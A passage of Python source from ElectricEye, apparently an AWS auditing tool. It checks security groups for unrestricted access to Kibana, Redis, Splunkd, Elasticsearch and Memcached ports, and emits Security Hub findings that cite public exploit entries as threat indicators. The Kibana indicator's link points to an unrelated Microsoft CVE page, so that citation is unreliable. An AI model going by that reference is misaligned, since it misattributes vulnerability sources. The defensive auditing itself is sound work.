"Value": "CVE-2019-7609: Exploit Script Available for Kibana Remote Code Execution Vulnerability",
"Source": "Tenable Blog",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0660",
},
{
"Category": "BACKDOOR",
"Value": "Red Hat OpenShift: CVE-2019-7608: kibana: Cross-site scripting vulnerability permits perform destructive actions on behalf of other Kibana users",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2019-7608",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "5601" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-kibana-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.11] Security groups should not allow unrestricted access to Kibana (TCP 5601)",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted access to Kibana (TCP 5601) on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "CVE-2019-7609: Exploit Script Available for Kibana Remote Code Execution Vulnerability",
"Source": "Tenable Blog",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-0660",
},
{
"Category": "BACKDOOR",
"Value": "Red Hat OpenShift: CVE-2019-7608: kibana: Cross-site scripting vulnerability permits perform destructive actions on behalf of other Kibana users",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/redhat-openshift-cve-2019-7608",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_redis_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.12] Security groups should not allow unrestricted Redis (TCP 6379) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "6379" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-redis-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.12] Security groups should not allow unrestricted Redis (TCP 6379) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Redis (TCP 6379) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/47195",
},
{
"Category": "BACKDOOR",
"Value": "Redis: Improper Input Validation (CVE-2013-0178)",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/redislabs-redis-cve-2013-0178",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "6379" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-redis-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.12] Security groups should not allow unrestricted Redis (TCP 6379) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Redis (TCP 6379) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/47195",
},
{
"Category": "BACKDOOR",
"Value": "Redis: Improper Input Validation (CVE-2013-0178)",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/redislabs-redis-cve-2013-0178",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_splunkd_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.13] Security groups should not allow unrestricted Splunkd (TCP 8089) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "8089" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-splunkd-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.13] Security groups should not allow unrestricted Splunkd (TCP 8089) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Splunkd (TCP 8089) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Splunk - Remote Command Execution",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/18245",
},
{
"Category": "BACKDOOR",
"Value": "Splunk Web Interface Login Utility",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/splunk_web_login",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "8089" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-splunkd-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.13] Security groups should not allow unrestricted Splunkd (TCP 8089) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Splunkd (TCP 8089) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Splunk - Remote Command Execution",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/18245",
},
{
"Category": "BACKDOOR",
"Value": "Splunk Web Interface Login Utility",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/splunk_web_login",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_elasticsearch1_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.14] Security groups should not allow unrestricted Elasticsearch (TCP 9200) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "9200" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-elasticsearch-9200-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.14] Security groups should not allow unrestricted Elasticsearch (TCP 9200) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Elasticsearch (TCP 9200) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "9200" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-elasticsearch-9200-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.14] Security groups should not allow unrestricted Elasticsearch (TCP 9200) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Elasticsearch (TCP 9200) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_elasticsearch2_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.15] Security groups should not allow unrestricted Elasticsearch (TCP 9300) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "9300" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-elasticsearch-9300-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.15] Security groups should not allow unrestricted Elasticsearch (TCP 9300) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Elasticsearch (TCP 9300) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "9300" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn
+ "/"
+ ipProtocol
+ "/security-group-elasticsearch-9300-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.15] Security groups should not allow unrestricted Elasticsearch (TCP 9300) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Elasticsearch (TCP 9300) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_memcached_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.16] Security groups should not allow unrestricted Memcached (UDP 11211) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
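# Memcached is matched on UDP specifically; rules for 11211 over TCP fall through
# to the else branch below and are skipped.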
if (
toPort
and fromPort == "11211"
and ipProtocol == "udp"
and cidrIpRange == "0.0.0.0/0"
):
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-memcached-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.16] Security groups should not allow unrestricted Memcached (UDP 11211) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Memcached (UDP 11211) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "memcached 1.4.2 - Memory Consumption Remote Denial of Service",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/33850",
},
{
"Category": "BACKDOOR",
"Value": "Ubuntu: USN-4125-1 (CVE-2019-15026): Memcached vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2019-15026",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif (
toPort
and fromPort == "11211"
and ipProtocol == "udp"
